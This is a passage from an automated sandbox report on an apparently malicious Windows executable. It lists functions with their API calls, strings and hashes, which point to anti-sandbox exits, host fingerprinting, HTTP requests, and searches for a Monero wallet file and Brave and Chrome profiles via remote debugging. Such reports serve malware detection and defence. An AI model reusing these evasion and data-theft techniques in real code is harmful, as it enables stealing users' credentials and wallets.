                                      • Part of subcall function 001962D0: HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                      • Part of subcall function 001962D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                      • Part of subcall function 001962D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: d72ad7627d1bfd050d1495d340565a5af9e9818108916f18e185ea0e9c119b23
                                    • Instruction ID: b993af58ce70d56ae7c647db85383e160a0f0b4caf6023224c862985123a7404
                                    • Opcode Fuzzy Hash: d72ad7627d1bfd050d1495d340565a5af9e9818108916f18e185ea0e9c119b23
                                    • Instruction Fuzzy Hash: A5111234A00108ABDB54FFB4DDA2AED7379AF61340FC14558F91A57492EF30AB04CA61
                                    Function 00191220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 191220-191247 call 1a8b40 GlobalMemoryStatusEx 1496 191249-191271 call 1add30 * 2 1493->1496 1497 191273-19127a 1493->1497 1499 191281-191285 1496->1499 1497->1499 1501 19129a-19129d 1499->1501 1502 191287 1499->1502 1504 191289-191290 1502->1504 1505 191292-191294 ExitProcess 1502->1505 1504->1501 1504->1505
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0019123E
                                    • ExitProcess.KERNEL32 ref: 00191294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: d0e721109dd94748d532a2c16113d0e079f96f39a5c1fe85f0eac33f8653eb45
                                    • Instruction ID: bda992c0bd4e7b198798f8b08d337291d7b05a496766f1471ba767a7f3b21aee
                                    • Opcode Fuzzy Hash: d0e721109dd94748d532a2c16113d0e079f96f39a5c1fe85f0eac33f8653eb45
                                    • Instruction Fuzzy Hash: C8016DB0D40308BBEF10EFE4DD4ABAEBB78AB14705F208458F605B62C0D7B455818759
                                    Function 001A7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: b89264a841fc85cef7f28da6658b7e770ceb81beb31b4caca2a559106139d131
                                    • Instruction ID: 99fd66b3b1ad2ba85446bd1c76d37741a04de3a3999fdafe7414aafed066f050
                                    • Opcode Fuzzy Hash: b89264a841fc85cef7f28da6658b7e770ceb81beb31b4caca2a559106139d131
                                    • Instruction Fuzzy Hash: 800186B5A08249ABC704CF98DD45BAFBBB8F705715F100269F506E32C0D7B45A0487A5
                                    Function 00191110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0019112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00191132
                                    • ExitProcess.KERNEL32 ref: 00191143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: b7301244bb8bf909e255e17fdb6ecec336fd5444b96f0b287b2d04d58181863c
                                    • Instruction ID: d7fec3c70194ffa63bffd8cfcd308c464790ea1a2c05686bca40e7fb3c57df4c
                                    • Opcode Fuzzy Hash: b7301244bb8bf909e255e17fdb6ecec336fd5444b96f0b287b2d04d58181863c
                                    • Instruction Fuzzy Hash: 32E01D7098930DFBEB105BA1DD1EB4D777C9B04B15F1001A5F709761D0D7F52540565D
                                    Function 001910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001910B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001910F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 4ada67581d81e6a5c4be6989427ceb6b988d28344c9b310f765026c904f99251
                                    • Instruction ID: 34489cb21b30cd1b72a05fd6f756584455e4c097c7f075e49ada4a725e2396c3
                                    • Opcode Fuzzy Hash: 4ada67581d81e6a5c4be6989427ceb6b988d28344c9b310f765026c904f99251
                                    • Instruction Fuzzy Hash: FBF082B1641318BBEB149AA4AC59FAEB798E705B15F300458F504E7280E6729E409AA5
                                    Function 00191190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                      • Part of subcall function 001A7A70: RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
                                      • Part of subcall function 001A7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                      • Part of subcall function 001A79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                      • Part of subcall function 001A79E0: RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                      • Part of subcall function 001A79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                    • ExitProcess.KERNEL32 ref: 001911C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 3351e8b95bd8b0e952e56bb9180d8e53ac2bbbf74d6e6788b0e9dd9bf78e80b6
                                    • Instruction ID: bed9af7b52efb2dd2b82fd58b0cee4e61e8b8b3d7da19687fa89cfdad61f8357
                                    • Opcode Fuzzy Hash: 3351e8b95bd8b0e952e56bb9180d8e53ac2bbbf74d6e6788b0e9dd9bf78e80b6
                                    • Instruction Fuzzy Hash: 7AE012E9D0430273CE1077B57C07B2B328C5B2634EF040834F905C2142FF65E940417A

                                    Non-executed Functions

                                    Function 0019BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,001B0B32,001B0B2F,00000000,?,?,?,001B1450,001B0B2E), ref: 0019BEC5
                                    • StrCmpCA.SHLWAPI(?,001B1454), ref: 0019BF33
                                    • StrCmpCA.SHLWAPI(?,001B1458), ref: 0019BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0019C8BB
                                    Strings
                                    • \Brave\Preferences, xrefs: 0019C1C1
                                    • Preferences, xrefs: 0019C104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C3B2
                                    • Brave, xrefs: 0019C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C495
                                    • Google Chrome, xrefs: 0019C6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 757f35a89c9b74d3a673fe5df45bbc439ec2f05e8015ec7fb9bbe2d65e62cfb4
                                    • Instruction ID: cb2a3ebc778888ba881e5159ec49fbe5cbcf8eb707e0fde9435a88867b354318
                                    • Opcode Fuzzy Hash: 757f35a89c9b74d3a673fe5df45bbc439ec2f05e8015ec7fb9bbe2d65e62cfb4
                                    • Instruction Fuzzy Hash: ED521476610108ABCF54FB60DDA6EEE737DAF65300F8045A9F50A66091EF306B48CF66
                                    Function 001A3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 001A3B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A3B33
                                    • lstrcat.KERNEL32(?,?), ref: 001A3B85
                                    • StrCmpCA.SHLWAPI(?,001B0F58), ref: 001A3B97
                                    • StrCmpCA.SHLWAPI(?,001B0F5C), ref: 001A3BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A3EB7
                                    • FindClose.KERNEL32(000000FF), ref: 001A3ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 786ec5fbba85f9b2f93f777b16b9f0e24afd751dd6af468c505d1c679ac8b580
                                    • Instruction ID: 277ba54444485c0f845de03d7b5520a026d194682450df0f0dfb0ee00b36048e
                                    • Opcode Fuzzy Hash: 786ec5fbba85f9b2f93f777b16b9f0e24afd751dd6af468c505d1c679ac8b580
                                    • Instruction Fuzzy Hash: EBA15EB5A00208ABDB24DFA4DC85FEA7379BF59304F044599F61D96181EB709B88CF62
                                    Function 001A4B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 001A4B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                    • StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                    • StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                    • FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*$@
                                    • API String ID: 180737720-3454383066
                                    • Opcode ID: 16cba2c770f0a1f393598813299f845106862641544b45809eb394c69e667fe3
                                    • Instruction ID: afac0ab26769d5cfbb6d4a0cba224d7b7ab2e34a74a0a010215b9d9b178dc382
                                    • Opcode Fuzzy Hash: 16cba2c770f0a1f393598813299f845106862641544b45809eb394c69e667fe3
                                    • Instruction Fuzzy Hash: BF615675900219ABCB24EBA0DC45FEA737CBB59704F4086DCF60996151FBB0AB84CFA5
                                    Function 001A47C0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001A47D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A47D7
                                    • wsprintfA.USER32 ref: 001A47F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A480D
                                    • StrCmpCA.SHLWAPI(?,001B0FAC), ref: 001A483B
                                    • StrCmpCA.SHLWAPI(?,001B0FB0), ref: 001A4851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A48DB
                                    • FindClose.KERNEL32(000000FF), ref: 001A48F0
                                    • lstrcat.KERNEL32(?,00E2EB40), ref: 001A4915
                                    • lstrcat.KERNEL32(?,00E2DE28), ref: 001A4928
                                    • lstrlen.KERNEL32(?), ref: 001A4935
                                    • lstrlen.KERNEL32(?), ref: 001A4946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
